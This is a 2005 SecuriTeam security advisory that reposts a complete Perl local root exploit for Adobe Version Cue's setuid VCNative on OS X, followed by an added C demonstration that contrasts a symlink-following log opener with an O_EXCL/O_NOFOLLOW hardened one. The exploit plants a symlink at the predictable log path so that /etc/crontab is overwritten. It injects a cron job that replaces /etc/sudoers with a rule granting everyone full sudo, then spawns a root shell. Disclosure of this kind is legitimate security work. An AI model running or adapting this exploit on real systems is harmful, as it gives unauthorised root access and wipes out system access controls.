[EXPL] Adobe Version Cue VCNative Symlink Attack (Exploit)

From: SecuriTeam (support_at_securiteam.com)
Date: 09/05/05

    To: list@securiteam.com
    Date: 5 Sep 2005 11:06:11 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

      Adobe Version Cue VCNative Symlink Attack (Exploit)
    ------------------------------------------------------------------------

    SUMMARY

    "Adobe Version Cue is a software version tracking system for Adobe products
    distributed with Adobe Creative Suite and select Adobe products."
    (http://www.adobe.com/products/creativesuite/versioncue.html)

    Lack of random name generation allows attackers to perform a symlink
    attack using Adobe Version Cue VCNative. The following exploit code can be
    used to test your system for the mentioned vulnerability.

    DETAILS

    Vulnerable Systems:
     * Adobe Version Cue version 1 on the Apple OS X platform

    Exploit:
    ------------------------ xosx-adobe-vcnative.pl ------------------------

    #!/usr/bin/perl
    #
    # Adobe Version Cue VCNative[OSX]: local root exploit.
    #
    # by: vade79/v9 v9 at fakehalo.us (fakehalo/realhalo)
    #
    # Adobe Version Cue's VCNative program writes data to a log file in
    # the current working directory while running as (setuid) root. the
    # logfile is formatted as <cwd>/VCNative-<pid>.log, which is easily
    # predictable. you may link this file to any file on the system
    # and overwrite its contents. use of the "-host" option (with
    # "-port") will allow user-supplied data to be injected into the
    # file.
    #
    # This exploit works by overwriting /etc/crontab with
    # '* * * * * root echo "ALL ALL=(ALL) ALL">/etc/sudoers' and
    # log garbage. within a short period of time crontab will overwrite
    # /etc/sudoers and "sudo sh" to root is possible. this method is used
    # because direct overwriting of /etc/sudoers will cause sudo to exit
    # with configuration errors due to the log garbage, whereas crontab
    # will ignore it. (this exploit requires both cron to be running and
    # sudo to exist--this is generally default osx)

    use POSIX;

    $vcn_path="/Applications/Adobe Version Cue/tomcat/webapps/ROOT/" .
     "WEB-INF/components/com.adobe.bauhaus.nativecomm/res/VCNative";
    $vcn_pid=($$ + 1);
    $vcn_cwd="/tmp";
    $vcn_tempfile="$vcn_cwd/VCNative-$vcn_pid\.log";
    $ovrfile="/etc/crontab";
    $ovrstr="* * * * * root echo \\\"ALL ALL=(ALL) ALL\\\">/etc/sudoers";

    sub pexit{print("[!] @_.\n");exit(1);}
    print("[*] Adobe Version Cue VCNative[OSX]: local root exploit.\n");
    print("[*] by: vade79/v9 v9\@fakehalo.us (fakehalo/realhalo)\n\n");
    if(!-f $vcn_path){
     pexit("VCNative binary doesn't appear to exist");
    }
    if(!-f"/etc/crontab"||!-f"/etc/sudoers"){
     pexit("/etc/crontab and /etc/sudoers are required for this to work");
    }
    print("[*] sym-linking $ovrfile -> $vcn_tempfile.\n");
    symlink($ovrfile,$vcn_tempfile)||pexit("couldn't link files.");
    @ast=stat($ovrfile);
    print("[*] running VCNative...\n");
    system("\"$vcn_path\" -cwd $vcn_cwd -port 1 -host \"\n\n$ovrstr\n\n\"");
    print("[*] removing $vcn_tempfile...\n");
    unlink($vcn_tempfile);
    @st=stat($ovrfile);
    if($st[7]==$ast[7]&&$st[9]==$ast[9]){
     pexit("$ovrfile was not modified, exploit failed");
    }
    else{
     print("[*] $ovrfile was overwritten successfully...\n");
    }
    print("[*] waiting for crontab to change /etc/sudoers...\n");
    @ast=@st=stat("/etc/sudoers");
    while($st[7]==$ast[7]&&$st[9]==$ast[9]){
     sleep(1);
     @ast=stat("/etc/sudoers");
    }
    print("[*] /etc/sudoers has been modified.\n");
    print("[*] attempting to \"sudo sh\". (use YOUR password)\n");
    system("sudo sh");
    exit(0);
    # EoF
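    The predictable-name log write described in the comments above, rebuilt as an added C example that is not part of the advisory or the exploit: a vulnerable opener that follows a pre-planted symlink, next to a hardened opener using O_EXCL|O_NOFOLLOW, both checked against a constructed decoy file in a fresh scratch directory (the function names and decoy paths are assumptions made for this demonstration).

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/stat.h>

/* Vulnerable pattern (as the advisory describes VCNative): predictable
 * name, symlinks followed, target truncated and overwritten. */
static int open_log_unsafe(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0644);
}

/* Hardened pattern: O_NOFOLLOW rejects a symlink as the final component
 * (ELOOP); O_EXCL rejects any pre-existing file or link (EEXIST). */
static int open_log_safe(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

/* Plant a symlink at the predictable <dir>/VCNative-<pid>.log path pointing
 * at a constructed decoy file, then try both openers through it. Returns 1
 * when the unsafe opener wrote through the link and the safe one refused. */
int demo_symlink_check(void) {
    char dir[] = "/tmp/vcdemo.XXXXXX";          /* constructed scratch dir */
    char target[256], link[256];
    struct stat st;
    int fd, wrote_through = 0, refused = 0;
    if (mkdtemp(dir) == NULL) return 0;
    snprintf(target, sizeof target, "%s/decoy.txt", dir);
    snprintf(link, sizeof link, "%s/VCNative-%d.log", dir, (int)getpid() + 1);
    fd = open(target, O_WRONLY | O_CREAT | O_TRUNC, 0600);
    if (fd < 0 || write(fd, "original\n", 9) != 9) return 0;
    close(fd);
    if (symlink(target, link) != 0) return 0;
    fd = open_log_unsafe(link);                  /* follows the link */
    if (fd >= 0) { if (write(fd, "garbage\n", 8) != 8) return 0; close(fd); }
    if (stat(target, &st) == 0) wrote_through = (st.st_size == 8);
    fd = open_log_safe(link);                    /* must refuse */
    refused = (fd < 0 && (errno == ELOOP || errno == EEXIST));
    if (fd >= 0) close(fd);
    unlink(link); unlink(target); rmdir(dir);
    return wrote_through && refused;
}

int main(void) {
    return demo_symlink_check() ? 0 : 1;   /* exit 0 when the check holds */
}
```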

    ADDITIONAL INFORMATION

    The information has been provided by v9 (v9@fakehalo.us).
